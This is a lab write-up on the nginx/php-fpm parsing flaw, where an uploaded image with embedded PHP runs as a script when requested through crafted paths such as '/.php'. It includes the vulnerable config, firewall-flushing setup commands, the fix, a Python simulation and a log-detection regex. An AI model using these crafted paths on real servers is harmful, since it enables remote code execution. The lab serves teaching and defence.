nginx file parsing vulnerability lab
1. Set up the lab environment
cd nginx_parsing_vulnerability/
docker-compose up -d
systemctl stop firewalld
iptables -F
Take an image file and write a phpinfo() call into it
Upload it
The upload page tells you the storage path
Request the image through the paths below
http://192.168.39.133/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/.php
http://192.168.39.133/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/%20/0.php
192.168.39.133/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/00%/0.php
Vulnerability analysis
When cgi.fix_pathinfo=1, the server behaves "smartly": it works out which part of the requested path is the real file, hands that file to php-cgi for execution, and stores the remainder of the path after the file in the environment variable $_SERVER['PATH_INFO']. Because the nginx location below routes any URI ending in .php to php-fpm, a request such as /uploadfiles/image.png/.php is sent to PHP, which then falls back to the existing file image.png and executes it as a script.
nginx configuration file
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /usr/share/nginx/html;
    index index.html index.php;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param REDIRECT_STATUS 200;
        fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
        fastcgi_param DOCUMENT_ROOT /var/www/html;
        fastcgi_pass php:9000;
    }
}
Fix: in php.ini, change cgi.fix_pathinfo=1 to cgi.fix_pathinfo=0 (provided this does not break the application).
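The following is an added example, not part of the original lab write-up and not vulhub's or nginx's own code. It models, in Python, how the vulnerable configuration above treats a request for an uploaded image followed by /.php: nginx matches the request on the `\.php$` regex alone, and with cgi.fix_pathinfo=1 PHP walks back along the path until it finds an existing file (the image), which it then executes. The same model shows two defender-side fixes: cgi.fix_pathinfo=0 (the fix the lab recommends) and an nginx-side `try_files $uri =404;` guard inside the php location, and finishes with a small detector run over constructed access-log lines. The php-cgi resolution logic is a simplified model, the document root and log lines are constructed, and the function names are assumptions.

```python
"""Model of the nginx + php-fpm parsing flaw, its fixes, and a log detector.
All data here is constructed for illustration; this is not the lab's code."""
import os
import re
import tempfile

# Constructed upload name, mirroring the md5-style file name used in the lab
IMAGE = "4a47a0db6e60853dedfcfdf08a5ca249.png"


def build_docroot():
    """Create a throwaway document root with one upload and one real script."""
    root = tempfile.mkdtemp(prefix="nginx_parsing_lab_")
    os.makedirs(os.path.join(root, "uploadfiles"))
    with open(os.path.join(root, "uploadfiles", IMAGE), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n<?php phpinfo(); ?>")  # image with PHP appended
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    return root


def nginx_matches_php_location(uri):
    """The lab config routes to php-fpm purely on `location ~ \\.php$`."""
    return re.search(r"\.php$", uri) is not None


def php_resolve_script(docroot, script_name, fix_pathinfo):
    """Simplified model of php-cgi's SCRIPT_FILENAME handling (assumption).

    fix_pathinfo=0: the whole path must be an existing file, otherwise PHP
    answers 'No input file specified' and nothing runs.
    fix_pathinfo=1: PHP strips trailing path components until it finds an
    existing file; the stripped tail becomes $_SERVER['PATH_INFO'].
    Returns (script_path, path_info) or None when nothing would execute.
    """
    parts = [p for p in script_name.split("/") if p]
    if fix_pathinfo == 0:
        full = os.path.join(docroot, *parts)
        return ("/" + "/".join(parts), "") if os.path.isfile(full) else None
    for i in range(len(parts), 0, -1):
        if os.path.isfile(os.path.join(docroot, *parts[:i])):
            path_info = "/" + "/".join(parts[i:]) if i < len(parts) else ""
            return ("/" + "/".join(parts[:i]), path_info)
    return None


def simulate_request(docroot, uri, fix_pathinfo, try_files_guard=False):
    """Return what the stack does with a URI: 'static', 'php:<file>' or '404'."""
    if not nginx_matches_php_location(uri):
        return "static"
    # Hardened variant: `try_files $uri =404;` inside the php location makes
    # nginx require that the literal URI exists before it reaches php-fpm.
    literal = os.path.join(docroot, *[p for p in uri.split("/") if p])
    if try_files_guard and not os.path.isfile(literal):
        return "404"
    resolved = php_resolve_script(docroot, uri, fix_pathinfo)
    return "php:" + resolved[0] if resolved else "404"


# Constructed nginx "combined" access-log lines: one normal image fetch, two
# parsing-abuse requests in the shapes the lab lists, and one normal script.
SAMPLE_LOG = """\
192.168.39.1 - - [01/Jan/2024:10:00:00 +0000] "GET /uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png HTTP/1.1" 200 512 "-" "curl/8.0"
192.168.39.1 - - [01/Jan/2024:10:00:01 +0000] "GET /uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/.php HTTP/1.1" 200 9000 "-" "curl/8.0"
192.168.39.1 - - [01/Jan/2024:10:00:02 +0000] "GET /uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/%20/0.php HTTP/1.1" 200 9000 "-" "curl/8.0"
192.168.39.1 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 20 "-" "curl/8.0"
"""

# A static-asset extension followed by further path that ends in a .php component
PARSING_ABUSE = re.compile(
    r'"(?:GET|POST) (\S*\.(?:png|jpe?g|gif|bmp|txt)/[^" ]*\.php)[ ?]', re.I)


def find_parsing_abuse(log_text):
    """Return request paths in an nginx access log that look like parsing abuse."""
    hits = []
    for line in log_text.splitlines():
        m = PARSING_ABUSE.search(line)
        if m:
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    root = build_docroot()
    uri = "/uploadfiles/" + IMAGE + "/.php"
    print("vulnerable      :", simulate_request(root, uri, fix_pathinfo=1))
    print("fix_pathinfo=0  :", simulate_request(root, uri, fix_pathinfo=0))
    print("try_files guard :", simulate_request(root, uri, 1, try_files_guard=True))
    print("log hits        :", find_parsing_abuse(SAMPLE_LOG))
```

Run the block directly to see the three outcomes side by side: with the lab's configuration the image is handed to PHP as the script, while either fix turns the same request into a 404. The detector regex keys on a static-file extension being followed by more path that ends in .php, which also catches the URL-encoded variants the lab lists, since nginx logs the request URI as received.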
Tear down the environment
docker-compose down